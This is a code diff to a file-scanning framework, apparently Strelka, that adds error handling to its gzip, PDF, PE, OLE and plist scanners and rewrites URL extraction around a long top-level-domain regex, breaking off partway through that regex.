diff --git a/configs/python/backend/backend.yaml b/configs/python/backend/backend.yaml index 21035abe..57ebdc2c 100644 --- a/configs/python/backend/backend.yaml +++ b/configs/python/backend/backend.yaml @@ -211,7 +211,6 @@ scanners: - 'html_file' priority: 5 options: - parser: "html5lib" max_hyperlinks: 50 # 'ScanIni': # - positive: @@ -613,6 +612,7 @@ scanners: flavors: - 'vb_file' - 'vbscript' + - 'hta_file' priority: 5 'ScanVba': - positive: diff --git a/src/python/strelka/scanners/scan_gzip.py b/src/python/strelka/scanners/scan_gzip.py index f9d2ef10..318a9364 100644 --- a/src/python/strelka/scanners/scan_gzip.py +++ b/src/python/strelka/scanners/scan_gzip.py @@ -1,5 +1,6 @@ import gzip import io +import zlib from strelka import strelka @@ -8,10 +9,17 @@ class ScanGzip(strelka.Scanner): """Decompresses gzip files.""" def scan(self, data, file, options, expire_at): - with io.BytesIO(data) as gzip_io: - with gzip.GzipFile(fileobj=gzip_io) as gzip_obj: - decompressed = gzip_obj.read() - self.event["size"] = len(decompressed) + try: + with io.BytesIO(data) as gzip_io: + with gzip.GzipFile(fileobj=gzip_io) as gzip_obj: + decompressed = gzip_obj.read() + self.event["size"] = len(decompressed) - # Send extracted file back to Strelka - self.emit_file(decompressed, name=file.name) + # Send extracted file back to Strelka + self.emit_file(decompressed, name=file.name) + except gzip.BadGzipFile: + self.flags.append("bad_gzip_file") + except zlib.error: + self.flags.append("bad_gzip_file") + except EOFError: + self.flags.append("eof_error") diff --git a/src/python/strelka/scanners/scan_ocr.py b/src/python/strelka/scanners/scan_ocr.py index d44f4c5d..c359b668 100644 --- a/src/python/strelka/scanners/scan_ocr.py +++ b/src/python/strelka/scanners/scan_ocr.py @@ -39,8 +39,10 @@ def scan(self, data, file, options, expire_at): # Convert PDF to PNG if required. if pdf_to_png and "application/pdf" in file.flavors.get("mime", []): try: - doc = fitz.open(stream=data, filetype="pdf") - data = doc.get_page_pixmap(0).tobytes("png") + reader = fitz.open(stream=data, filetype="pdf") + if reader.is_encrypted: + return + data = reader.get_page_pixmap(0).tobytes("png") except Exception as e: self.flags.append( f"{self.__class__.__name__}: image_pdf_error: {str(e)[:50]}" diff --git a/src/python/strelka/scanners/scan_ole.py b/src/python/strelka/scanners/scan_ole.py index 1f92491f..9af0c044 100644 --- a/src/python/strelka/scanners/scan_ole.py +++ b/src/python/strelka/scanners/scan_ole.py @@ -10,6 +10,7 @@ class ScanOle(strelka.Scanner): """Extracts files from OLECF files.""" def scan(self, data, file, options, expire_at): + ole = None self.event["total"] = {"streams": 0, "extracted": 0} try: @@ -47,5 +48,5 @@ def scan(self, data, file, options, expire_at): except OSError: self.flags.append("os_error") finally: - # TODO this should be wrapped with another try / catch as the variable assignment is not guaranteed - ole.close() + if ole: + ole.close() diff --git a/src/python/strelka/scanners/scan_pdf.py b/src/python/strelka/scanners/scan_pdf.py index d94a1567..f949a6d4 100644 --- a/src/python/strelka/scanners/scan_pdf.py +++ b/src/python/strelka/scanners/scan_pdf.py @@ -65,44 +65,48 @@ def scan(self, data, file, options, expire_at): # Set maximum XREF objects to be collected (default: 250) max_objects = options.get("max_objects", 250) - # Set Default Variables - self.event["images"] = 0 - self.event["lines"] = 0 - self.event["links"] = [] - self.event["words"] = 0 - self.event.setdefault("xref_object", list()) - keys = list() - try: with io.BytesIO(data) as pdf_io: reader = fitz.open(stream=pdf_io, filetype="pdf") # Collect Metadata + self.event["dirty"] = reader.is_dirty + self.event["encrypted"] = reader.is_encrypted + self.event["language"] = reader.language + self.event["needs_pass"] = reader.needs_pass + self.event["old_xrefs"] = reader.has_old_style_xrefs + self.event["pages"] = reader.page_count + self.event["repaired"] = reader.is_repaired + self.event["xrefs"] = reader.xref_length() - 1 + + if reader.is_encrypted: + return + + # Set Default Variables + self.event["images"] = 0 + self.event["lines"] = 0 + self.event["links"] = [] + self.event["words"] = 0 + self.event.setdefault("xref_object", list()) + keys = list() + self.event["author"] = reader.metadata["author"] self.event["creator"] = reader.metadata["creator"] self.event["creation_date"] = self._convert_timestamp( reader.metadata["creationDate"] ) - self.event["dirty"] = reader.is_dirty self.event["embedded_files"] = { "count": reader.embfile_count(), "names": reader.embfile_names(), } - self.event["encrypted"] = reader.is_encrypted - self.event["needs_pass"] = reader.needs_pass self.event["format"] = reader.metadata["format"] self.event["keywords"] = reader.metadata["keywords"] - self.event["language"] = reader.language self.event["modify_date"] = self._convert_timestamp( reader.metadata["modDate"] ) - self.event["old_xrefs"] = reader.has_old_style_xrefs - self.event["pages"] = reader.page_count self.event["producer"] = reader.metadata["producer"] - self.event["repaired"] = reader.is_repaired self.event["subject"] = reader.metadata["subject"] self.event["title"] = reader.metadata["title"] - self.event["xrefs"] = reader.xref_length() - 1 # Collect Phones Numbers phones = [] @@ -129,7 +133,9 @@ def scan(self, data, file, options, expire_at): if pattern in xref_object: keys.append(obj.lower()) # Extract urls from xref - self.event["links"].extend(re.findall('"(https?://.*?)"', xref_object)) + self.event["links"].extend( + re.findall(r"https?://[^\s)>]+", xref_object) + ) self.event["objects"] = dict(Counter(keys)) # Convert unique xref_object set back to list @@ -173,12 +179,20 @@ def scan(self, data, file, options, expire_at): self.event["words"] += len( list(filter(None, page.get_text().split(" "))) ) - # extract links + # Extract links for link in page.get_links(): self.event["links"].append(link.get("uri")) text += page.get_text() + # Extract urls from text + self.event["links"].extend(re.findall(r"https?://[^\s)>]+", text)) + + # If links found, remove all duplicates. + # Deduplicate the links + if self.event["links"]: + self.event["links"] = list(set(filter(None, self.event["links"]))) + # Send extracted file back to Strelka self.emit_file(text.encode("utf-8"), name="text") diff --git a/src/python/strelka/scanners/scan_pe.py b/src/python/strelka/scanners/scan_pe.py index 4e3a9a26..6d1cb443 100644 --- a/src/python/strelka/scanners/scan_pe.py +++ b/src/python/strelka/scanners/scan_pe.py @@ -397,15 +397,18 @@ def scan(self, data, file, options, expire_at): except pefile.PEFormatError: self.flags.append("pe_format_error") return + except AttributeError: + self.flags.append("pe_attribute_error") + return if rich_dict := parse_rich(pe): - if not isinstance(rich_dict, str): + if type(rich_dict) is str: self.event["rich"] = rich_dict else: self.flags.append(rich_dict) if cert_dict := parse_certificates(data): - if not isinstance(cert_dict, str): + if type(cert_dict) is str: self.event["security"] = cert_dict else: self.flags.append(cert_dict) @@ -455,30 +458,33 @@ def scan(self, data, file, options, expire_at): # https://github.com/erocarrera/pefile/blob/master/pefile.py#L3553 if hasattr(pe, "FileInfo"): - fi = pe.FileInfo[0] # contains a single element - for i in fi: - if i.Key == b"StringFileInfo": - for st in i.StringTable: - for k, v in st.entries.items(): - if k.decode() in COMMON_FILE_INFO_NAMES: - self.event["file_info"][ - COMMON_FILE_INFO_NAMES[k.decode()] - ] = v.decode() - else: - self.event["file_info"]["string"].append( - { - "name": k.decode(), - "value": v.decode(), - } - ) - elif i.Key == b"VarFileInfo": - for v in i.Var: - if translation := v.entry.get(b"Translation"): - (lang, char) = translation.split() - self.event["file_info"]["var"] = { - "language": VAR_FILE_INFO_LANGS.get(int(lang, 16)), - "character_set": VAR_FILE_INFO_CHARS.get(int(char, 16)), - } + if pe.FileInfo: + fi = pe.FileInfo[0] # contains a single element + for i in fi: + if i.Key == b"StringFileInfo": + for st in i.StringTable: + for k, v in st.entries.items(): + if k.decode() in COMMON_FILE_INFO_NAMES: + self.event["file_info"][ + COMMON_FILE_INFO_NAMES[k.decode()] + ] = v.decode() + else: + self.event["file_info"]["string"].append( + { + "name": k.decode(), + "value": v.decode(), + } + ) + elif i.Key == b"VarFileInfo": + for v in i.Var: + if translation := v.entry.get(b"Translation"): + (lang, char) = translation.split() + self.event["file_info"]["var"] = { + "language": VAR_FILE_INFO_LANGS.get(int(lang, 16)), + "character_set": VAR_FILE_INFO_CHARS.get( + int(char, 16) + ), + } if hasattr(pe, "VS_FIXEDFILEINFO"): vs_ffi = pe.VS_FIXEDFILEINFO[0] # contains a single element @@ -509,7 +515,7 @@ def scan(self, data, file, options, expire_at): self.event["header"] = { "machine": { "id": pe.FILE_HEADER.Machine, - "type": pefile.MACHINE_TYPE.get(pe.FILE_HEADER.Machine).replace( + "type": pefile.MACHINE_TYPE.get(pe.FILE_HEADER.Machine, "").replace( "IMAGE_FILE_MACHINE_", "" ), }, @@ -518,7 +524,7 @@ def scan(self, data, file, options, expire_at): "image": MAGIC_IMAGE.get(pe.OPTIONAL_HEADER.Magic, ""), }, "subsystem": pefile.SUBSYSTEM_TYPE.get( - pe.OPTIONAL_HEADER.Subsystem + pe.OPTIONAL_HEADER.Subsystem, "" ).replace("IMAGE_SUBSYSTEM_", ""), } @@ -600,43 +606,48 @@ def scan(self, data, file, options, expire_at): resource_sha256_set = set() for res0 in pe.DIRECTORY_ENTRY_RESOURCE.entries: - for res1 in res0.directory.entries: - for res2 in res1.directory.entries: - lang = res2.data.lang - sub = res2.data.sublang - sub = pefile.get_sublang_name_for_lang(lang, sub) - data = pe.get_data( - res2.data.struct.OffsetToData, res2.data.struct.Size - ) - - resource_md5 = hashlib.md5(data).hexdigest() - resource_sha1 = hashlib.sha1(data).hexdigest() - resource_sha256 = hashlib.sha256(data).hexdigest() - - resource_md5_set.add(resource_md5) - resource_sha1_set.add(resource_sha1) - resource_sha256_set.add(resource_sha256) - - resource_dict = { - "id": res1.id, - "language": {"sub": sub.replace("SUBLANG_", "")}, - "type": pefile.RESOURCE_TYPE.get(res0.id, "").replace( - "RT_", "" - ), - "md5": resource_md5, - "sha1": resource_sha1, - "sha256": resource_sha256, - } - - if lang in pefile.LANG: - resource_dict["language"]["primary"] = pefile.LANG[ - lang - ].replace("LANG_", "") - - if res1.name: - resource_dict["name"] = str(res1.name) - - self.event["resources"].append(resource_dict) + if hasattr(res0, "directory"): + for res1 in res0.directory.entries: + if hasattr(res1, "directory"): + for res2 in res1.directory.entries: + lang = res2.data.lang + sub = res2.data.sublang + sub = pefile.get_sublang_name_for_lang(lang, sub) + try: + data = pe.get_data( + res2.data.struct.OffsetToData, + res2.data.struct.Size, + ) + except pefile.PEFormatError: + continue + resource_md5 = hashlib.md5(data).hexdigest() + resource_sha1 = hashlib.sha1(data).hexdigest() + resource_sha256 = hashlib.sha256(data).hexdigest() + + resource_md5_set.add(resource_md5) + resource_sha1_set.add(resource_sha1) + resource_sha256_set.add(resource_sha256) + + resource_dict = { + "id": res1.id, + "language": {"sub": sub.replace("SUBLANG_", "")}, + "type": pefile.RESOURCE_TYPE.get( + res0.id, "" + ).replace("RT_", ""), + "md5": resource_md5, + "sha1": resource_sha1, + "sha256": resource_sha256, + } + + if lang in pefile.LANG: + resource_dict["language"]["primary"] = pefile.LANG[ + lang + ].replace("LANG_", "") + + if res1.name: + resource_dict["name"] = str(res1.name) + + self.event["resources"].append(resource_dict) # TODO: Add optional resource extraction diff --git a/src/python/strelka/scanners/scan_plist.py b/src/python/strelka/scanners/scan_plist.py index 61c82701..08e19a0d 100644 --- a/src/python/strelka/scanners/scan_plist.py +++ b/src/python/strelka/scanners/scan_plist.py @@ -20,20 +20,21 @@ def scan(self, data, file, options, expire_at): plist = plistlib.loads(data) self.event["keys"] = [] - for k, v in plist.items(): - if keys and k not in keys: - continue - - try: - v = ast.literal_eval(v) - except (ValueError, SyntaxError): - pass - - self.event["keys"].append( - { - "key": k, - "value": v, - } - ) + if isinstance(plist, dict): + for k, v in plist.items(): + if keys and k not in keys: + continue + + try: + v = ast.literal_eval(v) + except (ValueError, SyntaxError): + pass + + self.event["keys"].append( + { + "key": k, + "value": v, + } + ) except xml.parsers.expat.ExpatError: self.flags.append("invalid_format") diff --git a/src/python/strelka/scanners/scan_url.py b/src/python/strelka/scanners/scan_url.py index 1e05784a..599d1940 100644 --- a/src/python/strelka/scanners/scan_url.py +++ b/src/python/strelka/scanners/scan_url.py @@ -24,6 +24,8 @@ class ScanUrl(strelka.Scanner): """ def init(self): + # Default compiled regex pattern for URL extraction. + # This default pattern aims to match a wide range of URLs including those with TLDs. self.regexes = { "default": re.compile( rb'(?:\b[a-z\d.-]+://[^<>\s\(\)]+|\b(?:(?:(?:[^\s!@#$%^&*()_=+[\]{}\|;:\'",.<>/?]+)\.)+(?:aaa|aarp|abarth|abb|abbott|abbvie|abc|able|abogado|abudhabi|ac|academy|accenture|accountant|accountants|aco|active|actor|ad|adac|ads|adult|ae|aeg|aero|aetna|af|afamilycompany|afl|africa|ag|agakhan|agency|ai|aig|aigo|airbus|airforce|airtel|akdn|al|alfaromeo|alibaba|alipay|allfinanz|allstate|ally|alsace|alstom|am|americanexpress|americanfamily|amex|amfam|amica|amsterdam|analytics|android|anquan|anz|ao|aol|apartments|app|apple|aq|aquarelle|ar|arab|aramco|archi|army|arpa|art|arte|as|asda|asia|associates|at|athleta|attorney|au|auction|audi|audible|audio|auspost|author|auto|autos|avianca|aw|aws|ax|axa|az|azure|ba|baby|baidu|banamex|bananarepublic|band|bank|bar|barcelona|barclaycard|barclays|barefoot|bargains|baseball|basketball|bauhaus|bayern|bb|bbc|bbt|bbva|bcg|bcn|bd|be|beats|beauty|beer|bentley|berlin|best|bestbuy|bet|bf|bg|bh|bharti|bi|bible|bid|bike|bing|bingo|bio|biz|bj|black|blackfriday|blanco|blockbuster|blog|bloomberg|blue|bm|bms|bmw|bn|bnl|bnpparibas|bo|boats|boehringer|bofa|bom|bond|boo|book|booking|bosch|bostik|boston|bot|boutique|box|br|bradesco|bridgestone|broadway|broker|brother|brussels|bs|bt|budapest|bugatti|build|builders|business|buy|buzz|bv|bw|by|bz|bzh|ca|cab|cafe|cal|call|calvinklein|cam|camera|camp|cancerresearch|canon|capetown|capital|capitalone|car|caravan|cards|care|career|careers|cars|cartier|casa|case|caseih|cash|casino|cat|catering|catholic|cba|cbn|cbre|cbs|cc|cd|ceb|center|ceo|cern|cf|cfa|cfd|cg|ch|chanel|channel|charity|chase|chat|cheap|chintai|christmas|chrome|chrysler|church|ci|cipriani|circle|cisco|citadel|citi|citic|city|cityeats|ck|cl|claims|cleaning|click|clinic|clinique|clothing|cloud|club|clubmed|cm|cn|co|coach|codes|coffee|college|cologne|com|comcast|commbank|community|company|compare|computer|comsec|condos|construction|consulting|contact|contractors|cooking|cookingchannel|cool|coop|corsica|country|coupon|coupons|courses|cr|credit|creditcard|creditunion|cricket|crown|crs|cruise|cruises|csc|cu|cuisinella|cv|cw|cx|cy|cymru|cyou|cz|dabur|dad|dance|data|date|dating|datsun|day|dclk|dds|de|deal|dealer|deals|degree|delivery|dell|deloitte|delta|democrat|dental|dentist|desi|design|dev|dhl|diamonds|diet|digital|direct|directory|discount|discover|dish|diy|dj|dk|dm|dnp|do|docs|doctor|dodge|dog|doha|domains|dot|download|drive|dtv|dubai|duck|dunlop|duns|dupont|durban|dvag|dvr|dz|earth|eat|ec|eco|edeka|edu|education|ee|eg|email|emerck|energy|engineer|engineering|enterprises|epost|epson|equipment|er|ericsson|erni|es|esq|estate|esurance|et|etisalat|eu|eurovision|eus|events|everbank|exchange|expert|exposed|express|extraspace|fage|fail|fairwinds|faith|family|fan|fans|farm|farmers|fashion|fast|fedex|feedback|ferrari|ferrero|fi|fiat|fidelity|fido|film|final|finance|financial|fire|firestone|firmdale|fish|fishing|fit|fitness|fj|fk|flickr|flights|flir|florist|flowers|fly|fm|fo|foo|food|foodnetwork|football|ford|forex|forsale|forum|foundation|fox|fr|free|fresenius|frl|frogans|frontdoor|frontier|ftr|fujitsu|fujixerox|fun|fund|furniture|futbol|fyi|ga|gal|gallery|gallo|gallup|game|games|gap|garden|gb|gbiz|gd|gdn|ge|gea|gent|genting|george|gf|gg|ggee|gh|gi|gift|gifts|gives|giving|gl|glade|glass|gle|global|globo|gm|gmail|gmbh|gmo|gmx|gn|godaddy|gold|goldpoint|golf|goo|goodhands|goodyear|goog|google|gop|got|gov|gp|gq|gr|grainger|graphics|gratis|green|gripe|grocery|group|gs|gt|gu|guardian|gucci|guge|guide|guitars|guru|gw|gy|hair|hamburg|hangout|haus|hbo|hdfc|hdfcbank|health|healthcare|help|helsinki|here|hermes|hgtv|hiphop|hisamitsu|hitachi|hiv|hk|hkt|hm|hn|hockey|holdings|holiday|homedepot|homegoods|homes|homesense|honda|honeywell|horse|hospital|host|hosting|hot|hoteles|hotels|hotmail|house|how|hr|hsbc|ht|hu|hughes|hyatt|hyundai|ibm|icbc|ice|icu|id|ie|ieee|ifm|ikano|il|im|imamat|imdb|immo|immobilien|in|inc|industries|infiniti|info|ing|ink|institute|insurance|insure|int|intel|international|intuit|investments|io|ipiranga|iq|ir|irish|is|iselect|ismaili|ist|istanbul|it|itau|itv|iveco|jaguar|java|jcb|jcp|je|jeep|jetzt|jewelry|jio|jlc|jll|jm|jmp|jnj|jo|jobs|joburg|jot|joy|jp|jpmorgan|jprs|juegos|juniper|kaufen|kddi|ke|kerryhotels|kerrylogistics|kerryproperties|kfh|kg|kh|ki|kia|kim|kinder|kindle|kitchen|kiwi|km|kn|koeln|komatsu|kosher|kp|kpmg|kpn|kr|krd|kred|kuokgroup|kw|ky|kyoto|kz|la|lacaixa|ladbrokes|lamborghini|lamer|lancaster|lancia|lancome|land|landrover|lanxess|lasalle|lat|latino|latrobe|law|lawyer|lb|lc|lds|lease|leclerc|lefrak|legal|lego|lexus|lgbt|li|liaison|lidl|life|lifeinsurance|lifestyle|lighting|like|lilly|limited|limo|lincoln|linde|link|lipsy|live|living|lixil|lk|llc|loan|loans|locker|locus|loft|lol|london|lotte|lotto|love|lpl|lplfinancial|lr|ls|lt|ltd|ltda|lu|lundbeck|lupin|luxe|luxury|lv|ly|ma|macys|madrid|maif|maison|makeup|man|management|mango|map|market|marketing|markets|marriott|marshalls|maserati|mattel|mba|mc|mckinsey|md|me|med|media|meet|melbourne|meme|memorial|men|menu|merckmsd|metlife|mg|mh|miami|microsoft|mil|mini|mint|mit|mitsubishi|mk|ml|mlb|mls|mm|mma|mn|mo|mobi|mobile|mobily|moda|moe|moi|mom|monash|money|monster|mopar|mormon|mortgage|moscow|moto|motorcycles|mov|movie|movistar|mp|mq|mr|ms|msd|mt|mtn|mtr|mu|museum|mutual|mv|mw|mx|my|mz|na|nab|nadex|nagoya|name|nationwide|natura|navy|nba|nc|ne|nec|net|netbank|netflix|network|neustar|new|newholland|news|next|nextdirect|nexus|nf|nfl|ng|ngo|nhk|ni|nico|nike|nikon|ninja|nissan|nissay|nl|no|nokia|northwesternmutual|norton|now|nowruz|nowtv|np|nr|nra|nrw|ntt|nu|nyc|nz|obi|observer|off|office|okinawa|olayan|olayangroup|oldnavy|ollo|om|omega|one|ong|onl|online|onyourside|ooo|open|oracle|orange|org|organic|origins|osaka|otsuka|ott|ovh|pa|page|panasonic|panerai|paris|pars|partners|parts|party|passagens|pay|pccw|pe|pet|pf|pfizer|pg|ph|pharmacy|phd|philips|phone|photo|photography|photos|physio|piaget|pics|pictet|pictures|pid|pin|ping|pink|pioneer|pizza|pk|pl|place|play|playstation|plumbing|plus|pm|pn|pnc|pohl|poker|politie|porn|post|pr|pramerica|praxi|press|prime|pro|prod|productions|prof|progressive|promo|properties|property|protection|pru|prudential|ps|pt|pub|pw|pwc|py|qa|qpon|quebec|quest|qvc|racing|radio|raid|re|read|realestate|realtor|realty|recipes|red|redstone|redumbrella|rehab|reise|reisen|reit|reliance|ren|rent|rentals|repair|report|republican|rest|restaurant|review|reviews|rexroth|rich|richardli|ricoh|rightathome|ril|rio|rip|rmit|ro|rocher|rocks|rodeo|rogers|room|rs|rsvp|ru|rugby|ruhr|run|rw|rwe|ryukyu|sa|saarland|safe|safety|sakura|sale|salon|samsclub|samsung|sandvik|sandvikcoromant|sanofi|sap|sarl|sas|save|saxo|sb|sbi|sbs|sc|sca|scb|schaeffler|schmidt|scholarships|school|schule|schwarz|science|scjohnson|scor|scot|sd|se|search|seat|secure|security|seek|select|sener|services|ses|seven|sew|sex|sexy|sfr|sg|sh|shangrila|sharp|shaw|shell|shia|shiksha|shoes|shop|shopping|shouji|show|showtime|shriram|si|silk|sina|singles|site|sj|sk|ski|skin|sky|skype|sl|sling|sm|smart|smile|sn|sncf|so|soccer|social|softbank|software|sohu|solar|solutions|song|sony|soy|space|spiegel|sport|spot|spreadbetting|sr|srl|srt|st|stada|staples|star|starhub|statebank|statefarm|statoil|stc|stcgroup|stockholm|storage|store|stream|studio|study|style|su|sucks|supplies|supply|support|surf|surgery|suzuki|sv|swatch|swiftcover|swiss|sx|sy|sydney|symantec|systems|sz|tab|taipei|talk|taobao|target|tatamotors|tatar|tattoo|tax|taxi|tc|tci|td|tdk|team|tech|technology|tel|telefonica|temasek|tennis|teva|tf|tg|th|thd|theater|theatre|tiaa|tickets|tienda|tiffany|tips|tires|tirol|tj|tjmaxx|tjx|tk|tkmaxx|tl|tm|tmall|tn|to|today|tokyo|tools|top|toray|toshiba|total|tours|town|toyota|toys|tr|trade|trading|training|travel|travelchannel|travelers|travelersinsurance|trust|trv|tt|tube|tui|tunes|tushu|tv|tvs|tw|tz|ua|ubank|ubs|uconnect|ug|uk|unicom|university|uno|uol|ups|us|uy|uz|va|vacations|vana|vanguard|vc|ve|vegas|ventures|verisign|versicherung|vet|vg|vi|viajes|video|vig|viking|villas|vin|vip|virgin|visa|vision|vistaprint|viva|vivo|vlaanderen|vn|vodka|volkswagen|volvo|vote|voting|voto|voyage|vu|vuelos|wales|walmart|walter|wang|wanggou|warman|watch|watches|weather|weatherchannel|webcam|weber|website|wed|wedding|weibo|weir|wf|whoswho|wien|wiki|williamhill|win|windows|wine|winners|wme|wolterskluwer|woodside|work|works|world|wow|ws|wtc|wtf|xbox|xerox|xfinity|xihuan|xin|xn--11b4c3d|xn--1ck2e1b|xn--1qqw23a|xn--2scrj9c|xn--30rr7y|xn--3bst00m|xn--3ds443g|xn--3e0b707e|xn--3hcrj9c|xn--3oq18vl8pn36a|xn--3pxu8k|xn--42c2d9a|xn--45br5cyl|xn--45brj9c|xn--45q11c|xn--4gbrim|xn--54b7fta0cc|xn--55qw42g|xn--55qx5d|xn--5su34j936bgsg|xn--5tzm5g|xn--6frz82g|xn--6qq986b3xl|xn--80adxhks|xn--80ao21a|xn--80aqecdr1a|xn--80asehdb|xn--80aswg|xn--8y0a063a|xn--90a3ac|xn--90ae|xn--90ais|xn--9dbq2a|xn--9et52u|xn--9krt00a|xn--b4w605ferd|xn--bck1b9a5dre4c|xn--c1avg|xn--c2br7g|xn--cck2b3b|xn--cg4bki|xn--clchc0ea0b2g2a9gcd|xn--czr694b|xn--czrs0t|xn--czru2d|xn--d1acj3b|xn--d1alf|xn--e1a4c|xn--eckvdtc9d|xn--efvy88h|xn--estv75g|xn--fct429k|xn--fhbei|xn--fiq228c5hs|xn--fiq64b|xn--fiqs8s|xn--fiqz9s|xn--fjq720a|xn--flw351e|xn--fpcrj9c3d|xn--fzc2c9e2c|xn--fzys8d69uvgm|xn--g2xx48c|xn--gckr3f0f|xn--gecrj9c|xn--gk3at1e|xn--h2breg3eve|xn--h2brj9c|xn--h2brj9c8c|xn--hxt814e|xn--i1b6b1a6a2e|xn--imr513n|xn--io0a7i|xn--j1aef|xn--j1amh|xn--j6w193g|xn--jlq61u9w7b|xn--jvr189m|xn--kcrx77d1x4a|xn--kprw13d|xn--kpry57d|xn--kpu716f|xn--kput3i|xn--l1acc|xn--lgbbat1ad8j|xn--mgb9awbf|xn--mgba3a3ejt|xn--mgba3a4f16a|xn--mgba7c0bbn0a|xn--mgbaakc7dvf|xn--mgbaam7a8h|xn--mgbab2bd|xn--mgbai9azgqp6j|xn--mgbayh7gpa|xn--mgbb9fbpob|xn--mgbbh1a|xn--mgbbh1a71e|xn--mgbc0a9azcg|xn--mgbca7dzdo|xn--mgberp4a5d4ar|xn--mgbgu82a|xn--mgbi4ecexp|xn--mgbpl2fh|xn--mgbt3dhd|xn--mgbtx2b|xn--mgbx4cd0ab|xn--mix891f|xn--mk1bu44c|xn--mxtq1m|xn--ngbc5azd|xn--ngbe9e0a|xn--ngbrx|xn--node|xn--nqv7f|xn--nqv7fs00ema|xn--nyqy26a|xn--o3cw4h|xn--ogbpf8fl|xn--otu796d|xn--p1acf|xn--p1ai|xn--pbt977c|xn--pgbs0dh|xn--pssy2u|xn--q9jyb4c|xn--qcka1pmc|xn--qxam|xn--rhqv96g|xn--rovu88b|xn--rvc1e0am3e|xn--s9brj9c|xn--ses554g|xn--t60b56a|xn--tckwe|xn--tiq49xqyj|xn--unup4y|xn--vermgensberater-ctb|xn--vermgensberatung-pwb|xn--vhquv|xn--vuq861b|xn--w4r85el8fhu5dnra|xn--w4rs40l|xn--wgbh1c|xn--wgbl6a|xn--xhq521b|xn--xkc2al3hye2a|xn--xkc2dl3a5ee0h|xn--y9a3aq|xn--yfro4i67o|xn--ygbi2ammx|xn--zfr164b|xxx|xyz|yachts|yahoo|yamaxun|yandex|ye|yodobashi|yoga|yokohama|you|youtube|yt|yun|za|zappos|zara|zero|zip|zippo|zm|zone|zuerich|zw)|(?:(?:[0-9]|[1-9]\d|1\d{2}|2[0-4]\d|25[0-5])\.){3}(?:[0-9]|[1-9]\d|1\d{2}|2[0-4]\d|25[0-5]))(?:[;/][^#?<>\s]*)?(?:\?[^#<>\s]*)?(?:#[^<>\s\(\)]*)?(?!\w))' @@ -31,19 +33,28 @@ def init(self): } def scan(self, data, file, options, expire_at): - regex = options.get("regex", False) - if regex: - ((key, value),) = regex.items() - if key not in self.regexes: - self.regexes[key] = re.compile(value.encode()) - url_regex = self.regexes[key] - else: - url_regex = self.regexes["default"] - - normalized_data = b" ".join(data.split()) - self.event.setdefault("urls", []) - urls = url_regex.findall(normalized_data) - for url in urls: - url = url.strip(b"!\"#$%&'()*+,-./@:;<=>[\\]^_`{|}~") - if url not in self.event["urls"]: - self.event["urls"].append(url) + try: + # Obtain regex pattern from options or use the default one. + regex_key = options.get("regex", "default") + if regex_key not in self.regexes and regex_key in options: + # Compile and store the custom regex if provided and not already compiled. + self.regexes[regex_key] = re.compile(options[regex_key].encode()) + + url_regex = self.regexes[regex_key] + + # Normalize data: replace multiple whitespace characters with a single space. + normalized_data = re.sub(rb"\s+", b" ", data) + + # Initialize 'urls' event list to store extracted URLs. + self.event.setdefault("urls", []) + + # Find all URLs using the regex pattern. + urls = set(url_regex.findall(normalized_data)) + for url in urls: + # Strip leading and trailing punctuation characters from the URL. + clean_url = url.strip(b"!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~").decode() + if clean_url not in self.event["urls"]: + self.event["urls"].append(clean_url) + + except Exception as e: + self.flags.append(f"scanner_error: {e}") diff --git a/src/python/strelka/scanners/scan_vb.py b/src/python/strelka/scanners/scan_vb.py index dfcd654b..8fd51674 100644 --- a/src/python/strelka/scanners/scan_vb.py +++ b/src/python/strelka/scanners/scan_vb.py @@ -1,3 +1,5 @@ +import re + import pygments from pygments import formatters, lexers @@ -5,58 +7,143 @@ class ScanVb(strelka.Scanner): - """Collects metadata from Visual Basic script files. + """ + Scanner for Visual Basic (VB) script files. + + This scanner parses VB script files to extract various components like comments, + function names, strings, and URLs. It leverages the Pygments lexer for VB.NET to + tokenize the script data and then extracts useful information from these tokens. Attributes: - lexer: Pygments lexer ('vbnet') used to parse the file. + lexer: A Pygments lexer object for tokenizing VB.NET scripts. + url_regex: A compiled regex pattern for extracting URLs from the script. """ def init(self): + # Initialize the lexer for VB.NET language using Pygments self.lexer = lexers.get_lexer_by_name("vbnet") - def scan(self, data, file, options, expire_at): - highlight = pygments.highlight( - data, - self.lexer, - formatters.RawTokenFormatter(), + # Regular expression to capture URLs, considering various schemes and TLDs. + self.url_regex = re.compile( + r'(?:\b[a-z\d.-]+://[^<>\s\(\)]+|\b(?:(?:(?:[^\s!@#$%^&*()_=+[\]{}\|;:\'",.<>/?]+)\.)+(?:aaa|aarp|abarth|abb|abbott|abbvie|abc|able|abogado|abudhabi|ac|academy|accenture|accountant|accountants|aco|active|actor|ad|adac|ads|adult|ae|aeg|aero|aetna|af|afamilycompany|afl|africa|ag|agakhan|agency|ai|aig|aigo|airbus|airforce|airtel|akdn|al|alfaromeo|alibaba|alipay|allfinanz|allstate|ally|alsace|alstom|am|americanexpress|americanfamily|amex|amfam|amica|amsterdam|analytics|android|anquan|anz|ao|aol|apartments|app|apple|aq|aquarelle|ar|arab|aramco|archi|army|arpa|art|arte|as|asda|asia|associates|at|athleta|attorney|au|auction|audi|audible|audio|auspost|author|auto|autos|avianca|aw|aws|ax|axa|az|azure|ba|baby|baidu|banamex|bananarepublic|band|bank|bar|barcelona|barclaycard|barclays|barefoot|bargains|baseball|basketball|bauhaus|bayern|bb|bbc|bbt|bbva|bcg|bcn|bd|be|beats|beauty|beer|bentley|berlin|best|bestbuy|bet|bf|bg|bh|bharti|bi|bible|bid|bike|bing|bingo|bio|biz|bj|black|blackfriday|blanco|blockbuster|blog|bloomberg|blue|bm|bms|bmw|bn|bnl|bnpparibas|bo|boats|boehringer|bofa|bom|bond|boo|book|booking|bosch|bostik|boston|bot|boutique|box|br|bradesco|bridgestone|broadway|broker|brother|brussels|bs|bt|budapest|bugatti|build|builders|business|buy|buzz|bv|bw|by|bz|bzh|ca|cab|cafe|cal|call|calvinklein|cam|camera|camp|cancerresearch|canon|capetown|capital|capitalone|car|caravan|cards|care|career|careers|cars|cartier|casa|case|caseih|cash|casino|cat|catering|catholic|cba|cbn|cbre|cbs|cc|cd|ceb|center|ceo|cern|cf|cfa|cfd|cg|ch|chanel|channel|charity|chase|chat|cheap|chintai|christmas|chrome|chrysler|church|ci|cipriani|circle|cisco|citadel|citi|citic|city|cityeats|ck|cl|claims|cleaning|click|clinic|clinique|clothing|cloud|club|clubmed|cm|cn|co|coach|codes|coffee|college|cologne|com|comcast|commbank|community|company|compare|computer|comsec|condos|construction|consulting|contact|contractors|cooking|cookingchannel|cool|coop|corsica|country|c